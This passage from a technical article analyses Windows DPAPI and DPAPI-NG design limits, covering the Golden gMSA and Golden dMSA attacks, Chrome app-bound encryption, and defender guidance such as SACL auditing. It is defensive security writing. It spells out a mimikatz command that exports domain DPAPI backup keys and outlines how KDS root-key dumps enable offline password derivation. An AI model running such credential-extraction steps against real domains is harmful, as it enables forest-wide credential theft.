&lt;p&gt;The Server 2025 dMSA design has its own §10 footnote: the July 2025 Semperis Golden dMSA disclosure [@semperis-golden-dmsa] found that the &lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt; time-component has predictable structure with only ~1 024 plausible values, making offline brute-forcing tractable once the KDS root key is in hand.&lt;/p&gt;
&lt;h3&gt;8.3 Windows Hello for Business software-KSP credentials&lt;/h3&gt;
&lt;p&gt;The Hello for Business &lt;em&gt;how it works&lt;/em&gt; page [@ms-whfb-howitworks] describes the credential as a per-user per-device asymmetric key pair. On TPM-equipped devices the private key lives in the TPM and DPAPI-NG is not in the wrap path. On TPM-less devices (the structural worst case) the WHfB private key sits in a CNG software Key Storage Provider container persisted as a DPAPI-NG-protected file [@ms-whfb-howitworks] whose protection descriptor binds it to the user SID + device. The &lt;em&gt;TPM in Windows&lt;/em&gt; article in this series covers the TPM-bound case; here we record only that the software-KSP fallback rides on DPAPI-NG and inherits the KDS root-key dependency for the SID-bound branch.&lt;/p&gt;

A non-hardware-bound CNG key-storage provider that persists key material in DPAPI-NG-protected files in the user profile. Used by Windows Hello for Business on TPM-less devices [@ms-whfb-howitworks] and as the fallback when no hardware-bound KSP (TPM, smart card, Secure Enclave equivalent) is available. The structural worst case for the WHfB credential, because the private key lives in a file the OS can read in any user-context process, wrapped under a DPAPI-NG blob whose protection descriptor reduces back to the KDS root key for SID-anchored bindings.
&lt;h3&gt;8.4 Credential Guard isolated-secret persistence&lt;/h3&gt;
&lt;p&gt;The companion &lt;em&gt;Credential Guard&lt;/em&gt; article in this series covers &lt;code&gt;LsaIso.exe&lt;/code&gt; and the LSAISO trustlet&apos;s isolation boundary in depth; what matters here is that the trustlet&apos;s persistence layer is DPAPI-NG. &lt;code&gt;LsaIso.exe&lt;/code&gt;, running in VTL1 IUM, stores the isolated NT one-way function outputs and Kerberos session keys in DPAPI-NG blobs whose protection descriptor binds them to the trustlet&apos;s own identity. The VSM master key (TPM-bound on TPM-2.0 systems per Microsoft Learn&apos;s Credential Guard [@ms-credential-guard] overview, which describes how Credential Guard &quot;uses Virtualization-based security (VBS) [@ms-vbs] to isolate secrets&quot;) is what the trustlet seals its DPAPI-NG protection state under across reboots. The end result is that even though the Credential Guard model puts the credential outside &lt;code&gt;lsass.exe&lt;/code&gt;, the &lt;em&gt;persistence&lt;/em&gt; of that isolated secret rides on the same KDS-rooted DPAPI-NG chain every other consumer in this section uses.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Consumer&lt;/th&gt;
&lt;th&gt;Rotation&lt;/th&gt;
&lt;th&gt;Authorisation gate&lt;/th&gt;
&lt;th&gt;On-disk artefact&lt;/th&gt;
&lt;th&gt;Recovery story&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;gMSA&lt;/td&gt;
&lt;td&gt;30 days&lt;/td&gt;
&lt;td&gt;&lt;code&gt;msDS-GroupMSAMembership&lt;/code&gt; SDDL&lt;/td&gt;
&lt;td&gt;Cached on member via &lt;code&gt;Install-ADServiceAccount&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Recompute via KDS at any time&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;dMSA&lt;/td&gt;
&lt;td&gt;Managed by KDS&lt;/td&gt;
&lt;td&gt;Machine identity in AD&lt;/td&gt;
&lt;td&gt;Cached on member; &lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt; carries machine binding&lt;/td&gt;
&lt;td&gt;Recompute via KDS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WHfB software-KSP&lt;/td&gt;
&lt;td&gt;Per-credential lifetime&lt;/td&gt;
&lt;td&gt;User SID + device&lt;/td&gt;
&lt;td&gt;DPAPI-NG-wrapped key container in user profile&lt;/td&gt;
&lt;td&gt;New enrollment if lost&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LsaIso DPAPI-NG persistence&lt;/td&gt;
&lt;td&gt;Boot-cycle bound&lt;/td&gt;
&lt;td&gt;Trustlet identity&lt;/td&gt;
&lt;td&gt;Trustlet-managed VTL1 store, sealed under VSM master key&lt;/td&gt;
&lt;td&gt;Re-derive on next logon&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Every shipping Windows credential primitive that &lt;em&gt;just works&lt;/em&gt; across multiple devices, multiple service hosts, or multiple cold-boot cycles -- without per-application key-management code -- is sitting on the same KDS root key. The architectural bet is that the root key never leaks. The next two sections are about what happens when it does.&lt;/p&gt;
&lt;h2&gt;9. The Five Structural Ceilings DPAPI Cannot Close&lt;/h2&gt;
&lt;p&gt;A reader who has followed the chain through §§3-8 has earned the right to a sharp question: where does this whole architecture &lt;em&gt;fail&lt;/em&gt;? Not where does it have bugs (it has very few cryptographic ones); where does the &lt;em&gt;design&lt;/em&gt; draw a line that no implementation patch can move? There are exactly five such lines.&lt;/p&gt;
&lt;h3&gt;9.1 The user-context ceiling&lt;/h3&gt;
&lt;p&gt;Any process running as the user can call &lt;code&gt;CryptUnprotectData&lt;/code&gt; [@ms-cryptprotectdata] or &lt;code&gt;NCryptUnprotectSecret&lt;/code&gt; [@ms-ncryptprotectsecret] against any blob the user could decrypt. The chain binds the secret to the &lt;em&gt;user identity&lt;/em&gt;, not the &lt;em&gt;consuming process identity&lt;/em&gt;. This is the structural reason every modern browser-cookie-stealer family (Lokibot, Vidar, RedLine, Lumma, StealC) works against DPAPI-protected Chrome state keys; it is also the reason Google introduced Chrome app-bound encryption [@thn-app-bound] in July 2024 &lt;em&gt;outside&lt;/em&gt; DPAPI. Will Harris of the Chrome security team is verbatim about why the patch had to live outside DPAPI rather than inside it: &lt;em&gt;&quot;On Windows, Chrome uses the Data Protection API (...). However, the DPAPI does not protect against malicious applications able to execute code as the logged in user -- which info-stealers take advantage of.&quot;&lt;/em&gt;&lt;/p&gt;

On Windows, Chrome uses the Data Protection API (DPAPI). However, the DPAPI does not protect against malicious applications able to execute code as the logged in user -- which info-stealers take advantage of.
-- Will Harris, Chrome security team, July 2024
&lt;h3&gt;9.2 The single-password-derivation ceiling&lt;/h3&gt;
&lt;p&gt;The classic-DPAPI master-key wrap is &lt;code&gt;PBKDF2-HMAC-SHA512(SHA1(NT-hash), SID-as-UTF16LE, ~8000 iterations)&lt;/code&gt; in the modern (Windows 10/11) era per the Passcape table [@passcape-master-key-analysis]. 8 000 iterations of HMAC-SHA-512 is not strong against a modern wordlist attack on a leaked NT hash. The structural limit is &lt;em&gt;the user&apos;s password&lt;/em&gt;, not the cryptographic primitive. The KDF parameter is tunable; the &lt;em&gt;single secret in the chain&lt;/em&gt; is not -- a strong password makes the chain strong, a weak password makes the chain weak, and there is no architectural way to recover from a weak password short of re-deriving every user&apos;s master key under a stronger one.&lt;/p&gt;
&lt;h3&gt;9.3 The KDS-root-key irrotability ceiling&lt;/h3&gt;
&lt;p&gt;Once a KDS root key is in production use, rotating it would invalidate every gMSA &lt;code&gt;msDS-ManagedPassword&lt;/code&gt;, every dMSA password, every &lt;code&gt;SID=&lt;/code&gt; blob, every Hello-for-Business software-KSP container, and every Credential-Guard isolated-secret blob ever produced under it. Microsoft&apos;s documented mitigation is &lt;em&gt;preventative&lt;/em&gt; (a system access control list on &lt;code&gt;msKds-RootKeyData&lt;/code&gt;), not recoverable. This is the same structural ceiling that the Microsoft Learn DPAPI-backup-keys page [@ms-cng-dpapi-backup-keys] admits for the older &lt;code&gt;[MS-BKRP]&lt;/code&gt; keys, in identical language: &lt;em&gt;&quot;There currently is no officially supported way of changing or rotating these DPAPI backup keys on the domain controllers.&quot;&lt;/em&gt; Burn-the-forest-and-rebuild for &lt;code&gt;[MS-BKRP]&lt;/code&gt;; SACL-the-attribute-and-hope for KDS root keys.&lt;/p&gt;
&lt;h3&gt;9.4 The hibernation / S4 ceiling&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;CryptProtectMemory&lt;/code&gt; / &lt;code&gt;CryptUnprotectMemory&lt;/code&gt; [@ms-cryptprotectmemory] provide an in-memory scrub primitive that scopes a secret across same-process / cross-process / cross-session lifetimes. They cannot scrub RAM written to &lt;code&gt;hiberfil.sys&lt;/code&gt; on suspend-to-disk. On resume the master key is in plaintext in the page cache. The structural defence is BitLocker on the system volume (the &lt;em&gt;BitLocker on Windows&lt;/em&gt; article in this series covers full-volume encryption end-to-end); within DPAPI itself the ceiling cannot move because the OS has to be able to resume.&lt;/p&gt;
&lt;h3&gt;9.5 The domain-backup-key concentration ceiling&lt;/h3&gt;
&lt;p&gt;The &lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-bkrp/&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;[MS-BKRP]&lt;/code&gt;&lt;/a&gt; backup key is the recoverability story for the password-reset case -- and it is &lt;em&gt;also&lt;/em&gt; the structural reason any DA who can dump LSASS on a writable DC has every user&apos;s master key in the forest. &lt;code&gt;mimikatz &quot;lsadump::backupkeys /system:dc.contoso.local /export&quot;&lt;/code&gt; is the canonical primitive, documented in the Mimikatz DPAPI wiki [@mimikatz-dpapi-wiki]. The architectural answer (HSM-backing the DC&apos;s RSA private key) is not in Microsoft&apos;s mainline guidance; the recommendation when these keys are compromised [@ms-cng-dpapi-backup-keys] is the burn-the-forest-and-rebuild line we just quoted.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; These five ceilings are not bugs. They are the design&apos;s price for the design&apos;s other guarantees. The user-context ceiling buys ubiquitous adoption. The single-password ceiling buys a usable recovery path. The KDS-root-key ceiling buys cross-DC determinism. The hibernation ceiling buys process performance and resumability. The domain-backup-key ceiling buys enterprise recovery. Every one of the next five years&apos; DPAPI incidents will hit one of these five ceilings.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The 2022-2025 disclosures are not five surprises. They are five different attackers naming five different ceilings out loud. The next section walks the named incidents one ceiling at a time.&lt;/p&gt;
&lt;h2&gt;10. The 2022-2025 Residual Class: Golden gMSA, Golden dMSA, and Chromium App-Bound Encryption&lt;/h2&gt;
&lt;p&gt;In March 2022, Yuval Gordon (Microsoft Security Researcher, via Semperis blog) published &lt;em&gt;Introducing the Golden GMSA Attack&lt;/em&gt; [@semperis-golden-gmsa] and the &lt;code&gt;GoldenGMSA&lt;/code&gt; [@goldengmsa-repo] C# tool. In July 2024, Google announced Chrome&apos;s app-bound encryption [@google-security-blog-app-bound]. In July 2025, Adi Malyanker (also Semperis) published &lt;em&gt;Golden dMSA: What Is dMSA Authentication Bypass?&lt;/em&gt; [@semperis-golden-dmsa] and the &lt;code&gt;GoldenDMSA&lt;/code&gt; [@goldendmsa-repo] tool, mirrored on PR Newswire with a July 16, 2025 dateline [@prnewswire-semperis-dmsa]. Three disclosures in three years, three different ceilings -- but the same underlying pattern: each one is an admission that the structural ceiling cannot be patched inside DPAPI.&lt;/p&gt;

flowchart LR
    C1[&quot;§9.1 user-context&quot;] --&amp;gt; Chromium[&quot;Chromium app-bound encryption&lt;br /&gt;(July 2024, Will Harris)&quot;]
    C2[&quot;§9.3 KDS-root-key irrotability&quot;] --&amp;gt; GGMSA[&quot;Golden gMSA&lt;br /&gt;(March 2022, Y. Gordon)&quot;]
    C2 --&amp;gt; GDMSA[&quot;Golden dMSA&lt;br /&gt;(July 2025, A. Malyanker)&quot;]
    C3[&quot;§9.5 domain-backup-key&quot;] --&amp;gt; MimikatzBKK[&quot;mimikatz lsadump::backupkeys&quot;]
    C4[&quot;§9.4 hibernation / S4&quot;] --&amp;gt; BL[&quot;BitLocker article cross-link&quot;]
&lt;h3&gt;10.1 Golden gMSA (Yuval Gordon, Microsoft / Semperis blog, March 2022)&lt;/h3&gt;
&lt;p&gt;Targets the §9.3 KDS-root-key irrotability ceiling. Gordon is verbatim about the two-step nature of the attack: &lt;em&gt;&quot;An attacker with high privileges can obtain all the ingredients for generating the password of any gMSA in the domain at any time with two steps: Retrieve several attributes from the KDS root key in the domain... Use the GoldenGMSA tool to generate the password of any gMSA associated with the key, without a privileged account.&quot;&lt;/em&gt; Step 1 is a one-shot read of the KDS root key attributes. Step 2 is offline derivation. There is no further DC interaction, ever, because the &lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gkdi/943dd4f6-6b80-4a66-8594-80df6d2aad0a&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;[MS-GKDI]&lt;/code&gt; chain is deterministic&lt;/a&gt; by NIST SP 800-108r1 design.&lt;/p&gt;
&lt;p&gt;The defensive answer is in the GoldenGMSA repository [@goldengmsa-repo]: &lt;em&gt;&quot;configure a SACL on the KDS root key objects for everyone reading the msKds-RootKeyData attribute. Once the system access control list (SACL) is configured, any attempt to dump the key data of a KDS root key will generate security event 4662 on the DC where the object type is msKds-ProvRootKey and the account name is not a DC.&quot;&lt;/em&gt; Plus the cross-trust SACL on &lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt; with property GUID &lt;code&gt;{0e78295a-c6d3-0a40-b491-d62251ffa0a6}&lt;/code&gt;. This is a &lt;em&gt;detective&lt;/em&gt; control, not a &lt;em&gt;recovery&lt;/em&gt; control. Once the root key has been read, every gMSA password the forest has ever issued or will ever issue under that root key is offline-derivable.&lt;/p&gt;

An attacker with high privileges can obtain all the ingredients for generating the password of any gMSA in the domain at any time with two steps.
-- Yuval Gordon, Microsoft / Semperis blog, March 2022
&lt;p&gt;The Golden gMSA SACL detects same-trust reads only. Cross-trust reads of &lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt; from a forest the auditing forest does not control are the documented detection blind-spot. If your gMSA-using forest has a one-way trust from a forest you do not own, you cannot see its reads.&lt;/p&gt;
&lt;h3&gt;10.2 Golden dMSA (Adi Malyanker, Semperis, July 2025)&lt;/h3&gt;
&lt;p&gt;Targets the §9.3 ceiling, plus a fresh dMSA-specific surface. Malyanker is verbatim about the structural flaw: &lt;em&gt;&quot;a critical design flaw: a structure that&apos;s used for the password-generation computation contains predictable time-based components with only 1,024 possible combinations, making brute-force password generation computationally trivial.&quot;&lt;/em&gt; The four-phase pipeline is enumerated in the GoldenDMSA repository [@goldendmsa-repo]: &lt;em&gt;&quot;Phase 1: Key Material Extraction (pre requirement of the attack) -- Dump the KDS Root Key from the DC. Phase 2: Enumerate dMSA accounts ... Phase 3: ManagedPasswordID guessing ... Phase 4: Password Generation.&quot;&lt;/em&gt; The tool exposes commands &lt;code&gt;wordlist&lt;/code&gt;, &lt;code&gt;info&lt;/code&gt;, &lt;code&gt;kds&lt;/code&gt;, &lt;code&gt;bruteforce&lt;/code&gt;, &lt;code&gt;compute&lt;/code&gt;, and &lt;code&gt;convert&lt;/code&gt; -- the operational vocabulary the four-phase pipeline needs.&lt;/p&gt;
&lt;p&gt;Semperis&apos; own rating is MODERATE with the explicit caveat &lt;em&gt;&quot;to exploit it, attackers must possess a KDS root key available only to only the most privileged accounts: root Domain Admins, Enterprise Admins, and SYSTEM.&quot;&lt;/em&gt; That is exactly the §9.3 ceiling re-stated. The novelty in dMSA is the 1 024-combination time-component flaw -- a design weakness on top of the structural ceiling, not a substitute for it.&lt;/p&gt;
&lt;h3&gt;10.3 Chromium app-bound encryption (Will Harris, Google Chrome, July 30, 2024)&lt;/h3&gt;
&lt;p&gt;Targets the §9.1 user-context ceiling. The Google Security Blog announcement [@google-security-blog-app-bound] describes a COM-elevation service that wraps the Chrome state key with both DPAPI &lt;em&gt;and&lt;/em&gt; a per-binary identity check the COM service enforces. The verbatim quote, mirrored via The Hacker News [@thn-app-bound]: &lt;em&gt;&quot;Because the app-bound service is running with system privileges, attackers need to do more than just coax a user into running a malicious app. Now, the malware has to gain system privileges, or inject code into Chrome, something that legitimate software shouldn&apos;t be doing.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The architecturally important word is &lt;em&gt;&quot;app-bound.&quot;&lt;/em&gt; Chromium&apos;s response &lt;em&gt;to the user-context ceiling&lt;/em&gt; lives outside DPAPI. DPAPI itself is unchanged. The 2024 patch is application-layer code-identity pinning -- exactly what Generation-1 Protected Storage&apos;s abandoned Authenticode-access-rule clause was supposed to be in 2000, exactly what Apple Keychain [@apple-platform-security-keychain] has shipped on macOS for over two decades, exactly what the §11 wishlist asks for.&lt;/p&gt;
&lt;h3&gt;10.4 The recurring pattern&lt;/h3&gt;
&lt;p&gt;Each disclosure does &lt;em&gt;not&lt;/em&gt; break a cryptographic primitive. Each is a re-statement of &quot;the design&apos;s ceiling is the design&apos;s ceiling.&quot; The defensive answers are &lt;em&gt;detection&lt;/em&gt; (SACL audit; cross-trust read alerting; binary-identity check) and &lt;em&gt;workaround at a higher layer&lt;/em&gt; (the COM-elevation service Chrome wraps DPAPI in), never &lt;em&gt;cryptographic strengthening of DPAPI itself&lt;/em&gt;. The 2026 reader&apos;s job is to recognise which ceiling each new incident hits.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Disclosure&lt;/th&gt;
&lt;th&gt;Ceiling hit&lt;/th&gt;
&lt;th&gt;Tool reference&lt;/th&gt;
&lt;th&gt;Defensive answer&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;2022&lt;/td&gt;
&lt;td&gt;Golden gMSA (Y. Gordon, Microsoft / Semperis blog)&lt;/td&gt;
&lt;td&gt;§9.3 KDS irrotability&lt;/td&gt;
&lt;td&gt;&lt;code&gt;GoldenGMSA&lt;/code&gt; [@goldengmsa-repo]&lt;/td&gt;
&lt;td&gt;SACL on &lt;code&gt;msKds-RootKeyData&lt;/code&gt;; Event 4662&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;Chromium app-bound encryption (W. Harris, Google)&lt;/td&gt;
&lt;td&gt;§9.1 user-context&lt;/td&gt;
&lt;td&gt;Chrome 127 release notes [@chromereleases-127-stable]&lt;/td&gt;
&lt;td&gt;COM-elevation per-binary identity check, outside DPAPI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025&lt;/td&gt;
&lt;td&gt;Golden dMSA (A. Malyanker, Semperis)&lt;/td&gt;
&lt;td&gt;§9.3 + dMSA &lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt; predictability&lt;/td&gt;
&lt;td&gt;&lt;code&gt;GoldenDMSA&lt;/code&gt; [@goldendmsa-repo]&lt;/td&gt;
&lt;td&gt;SACL plus monitoring &lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt; brute-force&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;By 2026 the pattern is clear: DPAPI&apos;s structural ceilings produce a steady drip of disclosures, each defensively answerable but none cryptographically fixable inside DPAPI itself. The open question is what the &lt;em&gt;successor&lt;/em&gt; would even look like -- and that is the next section.&lt;/p&gt;
&lt;h2&gt;11. Open Problems&lt;/h2&gt;
&lt;p&gt;A few sharp open problems remain at the design layer -- problems that a future Generation 4 of the credential-vault tradition would have to solve. None of them is in Microsoft&apos;s published roadmap as of 2026.&lt;/p&gt;
&lt;h3&gt;KDS root-key rotation&lt;/h3&gt;
&lt;p&gt;A hybrid wrap-then-re-wrap-on-first-decrypt-under-new-root scheme could in principle restore rotation without invalidating existing blobs: every consumer would carry a tag indicating which root-key generation last unwrapped it; on first unwrap under a generation-N+1 root the system would re-wrap the consumer-side cache. No standard or product implements this today; no public proposal revises &lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gkdi/943dd4f6-6b80-4a66-8594-80df6d2aad0a&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;[MS-GKDI]&lt;/code&gt;&lt;/a&gt; to add it.&lt;/p&gt;
&lt;h3&gt;Code-identity pinning&lt;/h3&gt;
&lt;p&gt;Apple Keychain [@apple-platform-security-keychain] enforces &lt;em&gt;&quot;keychain items can be shared only between apps from the same developer ... enforced through code signing, provisioning profiles, and the Apple Developer Program.&quot;&lt;/em&gt; DPAPI / DPAPI-NG have no equivalent. A &lt;code&gt;CALLER_ATTRIBUTION=Publisher:&amp;lt;wdac-rule-hash&amp;gt;&lt;/code&gt; descriptor would, in principle, give Windows the same property -- the SHA-256 hash of the WDAC rule [@paragmali-com-app-ide] that authorises the calling binary, baked into the descriptor, checked at unwrap time. No one is shipping it. The 2024 Chromium app-bound encryption response [@thn-app-bound] is the application-layer workaround that proves the design gap is real.&lt;/p&gt;
&lt;h3&gt;Post-quantum migration&lt;/h3&gt;
&lt;p&gt;DPAPI-NG today uses RSA or ECDH key transport via CMS enveloped-content format (&lt;code&gt;CERTIFICATE=&lt;/code&gt; with RSA private keys, &lt;code&gt;SID=&lt;/code&gt; for group descriptors) per the protected-data-format [@ms-protected-data-format] reference. Both wrap algorithms are vulnerable to Shor&apos;s algorithm on a sufficiently large quantum computer, and the persistent on-disk blob format is the harvest-now-decrypt-later target -- a framing surfaced across NIST&apos;s broader post-quantum migration corpus, including the NIST PQC project page [@nist-pqc-project] and the linked NIST IR 8547 migration-timeline document. The migration story for the symmetric chain is comparatively easy (the SP800-108 KDF is parameterised; HMAC-SHA-512 has no quantum-cliff weakness for the relevant key sizes). The migration story for the public-key wrap is the hard part. NIST published FIPS 203 (ML-KEM) [@nist-fips-203] and FIPS 204 (ML-DSA) [@nist-fips-204] in August 2024; OpenSSH 9.9 [@openssh-9-9-release] (September 2024) and TLS deployments shipped hybrid post-quantum key exchange. Windows added experimental post-quantum TLS support in 2024 but has not yet announced ML-KEM CNG-DPAPI providers; see the companion &lt;em&gt;Post-Quantum Cryptography on Windows&lt;/em&gt; [@paragmali-com-year-migrati] article in this series for the broader Windows migration story. The shape that fits DPAPI&apos;s ceiling-laden design is hybrid wrap-then-re-wrap-on-first-decrypt: a hybrid wrap (&lt;code&gt;RSA-OAEP || ML-KEM&lt;/code&gt; or &lt;code&gt;ECDH || ML-KEM&lt;/code&gt;) -- protect under (RSA+ML-KEM) or (ECDH+ML-KEM) today; let consumers re-wrap to the new combiner on first unwrap; phase out the classical half on a long horizon -- is the only forward-compatible answer; Microsoft&apos;s published DPAPI-NG protection-providers [@ms-protection-providers] have not yet announced one.&lt;/p&gt;
&lt;h3&gt;Credential roaming for Entra-joined-only / unmanaged-device estates&lt;/h3&gt;
&lt;p&gt;Classic DPAPI&apos;s cross-device story has always been &quot;use roaming profiles&quot; (deprecated) or &quot;use the &lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-bkrp/&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;[MS-BKRP]&lt;/code&gt;&lt;/a&gt; backup key&quot; (admin-recovery, not user-driven). DPAPI-NG&apos;s &lt;code&gt;SID=&lt;/code&gt; solves it cleanly for AD-joined estates but the modern Entra-only estate has no native equivalent -- the &lt;code&gt;LOCAL=user&lt;/code&gt; descriptor is per-machine. An &lt;code&gt;ENTRAGROUP=&amp;lt;object-id&amp;gt;&lt;/code&gt; descriptor that resolved through Entra ID Token Service the way &lt;code&gt;SID=&lt;/code&gt; resolves through KDS would close the gap. No public roadmap announces this.&lt;/p&gt;
&lt;h3&gt;Hibernation / S4&lt;/h3&gt;
&lt;p&gt;BitLocker [@wikipedia-bitlocker] on the system volume defends the disk; suspending fully to ROM (or refusing S4 entirely) defends the in-RAM master key. Hardware-bound key derivation (TPM-released-only-while-PCRs-stable) would close more of the gap; the &lt;em&gt;TPM in Windows&lt;/em&gt; article in this series covers TPM-bound primitives that approximate this property.&lt;/p&gt;
&lt;p&gt;Every one of these is a &lt;em&gt;design&lt;/em&gt; gap -- a property the architecture would need a new primitive to satisfy. None is on Microsoft&apos;s announced roadmap. The architecture we have is the architecture we will have for at least the next five years; the practitioner&apos;s job is to know which ceilings their estate is exposed to and how to detect each of them.&lt;/p&gt;
&lt;h2&gt;12. Practical Guide and Closing&lt;/h2&gt;
&lt;p&gt;The four-audience guide for the 2026 practitioner.&lt;/p&gt;
&lt;h3&gt;12.1 For a developer&lt;/h3&gt;
&lt;p&gt;Use &lt;code&gt;CryptProtectData&lt;/code&gt; / &lt;code&gt;CryptUnprotectData&lt;/code&gt; [@ms-cryptprotectdata] for per-user-on-this-device secrets. Pass &lt;code&gt;pOptionalEntropy&lt;/code&gt; to &lt;em&gt;bind&lt;/em&gt; the blob to a per-application secret -- but understand it is security-by-obscurity, not a code-identity check; any reader of the SharpDPAPI source [@sharpdpapi-readme] who knows your constant entropy can reproduce the unprotect call as the user.&lt;/p&gt;
&lt;p&gt;Use &lt;code&gt;NCryptProtectSecret&lt;/code&gt; [@ms-ncryptprotectsecret] with the appropriate descriptor for cross-device or multi-principal cases. &lt;code&gt;LOCAL=user&lt;/code&gt; mirrors classic DPAPI on a single machine. &lt;code&gt;SID=&amp;lt;group-sid&amp;gt;&lt;/code&gt; reaches AD groups via KDS. &lt;code&gt;CERTIFICATE=HashID:&amp;lt;sha1&amp;gt;&lt;/code&gt; reaches a named certificate (TPM-backed for the high-security case). Use the WebAuthn / FIDO2 path for &lt;em&gt;authentication&lt;/em&gt; secrets; do not store passwords in DPAPI when WHfB / passkey paths are available.&lt;/p&gt;
&lt;p&gt;{`
// Returns the appropriate DPAPI-NG protection-descriptor string for a use case.
// Reference: learn.microsoft.com windows win32 seccng protection-descriptors
function descriptorFor(useCase, ctx) {
  switch (useCase) {
    case &quot;single-device-single-user&quot;:
      return &quot;LOCAL=user&quot;;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;case &quot;ad-group&quot;:
  // Multiple machines, AD-authorized group members can decrypt.
  return &quot;SID=&quot; + ctx.groupSid;

case &quot;tpm-backed-cert&quot;:
  // Decrypter must hold the named certificate&apos;s private key (TPM-bound KSP).
  return &quot;CERTIFICATE=HashID:&quot; + ctx.certThumbprintSha1;

case &quot;web-credential&quot;:
  // Resolves through the Windows credential broker.
  return &quot;WEBCREDENTIALS=&quot; + ctx.credName;

default:
  throw new Error(&quot;Unknown use case: &quot; + useCase);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;  }
}&lt;/p&gt;
&lt;p&gt;console.log(descriptorFor(&quot;single-device-single-user&quot;));
console.log(descriptorFor(&quot;ad-group&quot;, { groupSid: &quot;S-1-5-21-...-5101&quot; }));
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The &lt;code&gt;pOptionalEntropy&lt;/code&gt; parameter to &lt;code&gt;CryptProtectData&lt;/code&gt; lets you tag a blob with an extra secret the unwrap call must supply. It does not bind the blob to a process or a publisher. If your &quot;entropy&quot; is a constant compiled into your binary, every reverse-engineer who reads the binary can reproduce your unprotect call as the user. For real per-application separation today, use the Chromium 2024 pattern [@thn-app-bound]: wrap your DPAPI / DPAPI-NG blob in a SYSTEM-elevated COM service that enforces a per-binary identity check.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;12.2 For a defender or DFIR analyst&lt;/h3&gt;
&lt;p&gt;Triage the credential-vault inventory in §5 first. The high-value paths are &lt;code&gt;%APPDATA%\Microsoft\Protect\&amp;amp;lt;SID&amp;amp;gt;\&lt;/code&gt;, &lt;code&gt;%APPDATA%\Microsoft\Protect\CREDHIST&lt;/code&gt;, &lt;code&gt;%APPDATA%\Microsoft\Credentials\&lt;/code&gt;, &lt;code&gt;%LOCALAPPDATA%\Microsoft\Vault\&lt;/code&gt;, the Chromium / Edge profile databases, and the AD &lt;code&gt;CN=Master Root Keys,...&lt;/code&gt; container.&lt;/p&gt;
&lt;p&gt;The SACL guidance from the GoldenGMSA repository [@goldengmsa-repo] is the only detective control today: &lt;em&gt;&quot;configure a SACL on the KDS root key objects for everyone reading the msKds-RootKeyData attribute. Once the system access control list (SACL) is configured, any attempt to dump the key data of a KDS root key will generate security event 4662 on the DC where the object type is msKds-ProvRootKey and the account name is not a DC.&quot;&lt;/em&gt; Plus the cross-trust SACL on &lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt; with property GUID &lt;code&gt;{0e78295a-c6d3-0a40-b491-d62251ffa0a6}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Tooling: Mimikatz [@mimikatz-dpapi-wiki] &lt;code&gt;dpapi::*&lt;/code&gt; modules, SharpDPAPI [@sharpdpapi-readme], DPAPIck [@bursztein-talk-page] (Bursztein-Picod 2010), GoldenGMSA [@goldengmsa-repo], GoldenDMSA [@goldendmsa-repo], and the Volatility [@volatility3-repo] &lt;code&gt;lsadump&lt;/code&gt; / &lt;code&gt;cachedump&lt;/code&gt; / &lt;code&gt;hashdump&lt;/code&gt; plugins for live-memory extraction of &lt;code&gt;DPAPI_SYSTEM&lt;/code&gt; and the other LSA secrets that seed SYSTEM-context master-key derivation.&lt;/p&gt;
&lt;p&gt;{`&lt;/p&gt;
Walk a synthetic profile-directory layout and emit a DPAPI-relevant triage report.
&lt;p&gt;import os
from collections import defaultdict&lt;/p&gt;
Synthetic profile layout for demonstration only.
&lt;p&gt;synthetic = {
    &quot;Users/alice/AppData/Roaming/Microsoft/Protect/S-1-5-21-1234-1001/Preferred&quot;: &quot;8KB&quot;,
    &quot;Users/alice/AppData/Roaming/Microsoft/Protect/S-1-5-21-1234-1001/0d4a...&quot;: &quot;740B&quot;,
    &quot;Users/alice/AppData/Roaming/Microsoft/Protect/CREDHIST&quot;: &quot;176B&quot;,
    &quot;Users/alice/AppData/Roaming/Microsoft/Credentials/abcdef...&quot;: &quot;300B&quot;,
